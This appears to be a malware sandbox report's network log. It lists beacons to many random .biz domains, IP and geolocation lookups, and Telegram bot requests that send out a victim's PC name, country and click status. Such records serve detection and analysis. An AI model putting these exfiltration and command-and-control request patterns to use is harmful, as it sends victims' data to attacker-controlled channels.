                  Source: global trafficHTTP traffic detected: POST /ay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /gyylxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /lpjrtgtrcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /lmfbvinyrxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /buvxjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /pjrcxvgcrciphj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /pfwejjlunhfbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /fktafvxejauk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /msbflok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /mxcqktbjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /ouxosbeu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /yoeqoxifmyybhvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /tcvwahikyjxgou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /rrkpugwxhmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /xqjf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /ljgqqouxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /hmjljoygme HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /pabdnlclvrbkpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /hlrrkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /kxovwpejbxujie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /aktkoaqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /gfoywiqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /fxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /wwhsdeosr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /stsqeigba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /polgcwglcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /qlboy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /ayuhmcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /vxrwony HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /tknftu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /fqcyfjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /arya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /kxri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /ssxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /klwkdohmlimacmer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /kqufyo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /uqgubhowqkworycc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /jllcvkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /htdxfxsikhflmhhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /unklgjihfthc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49685 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49724 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2010/04/2025%20/%2023:15:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2011/04/2025%20/%2009:21:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /r?usid=27&utid=12022892926 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /ryyftbrdpkr?usid=27&utid=12022893059 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
                  Source: global trafficHTTP traffic detected: GET /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
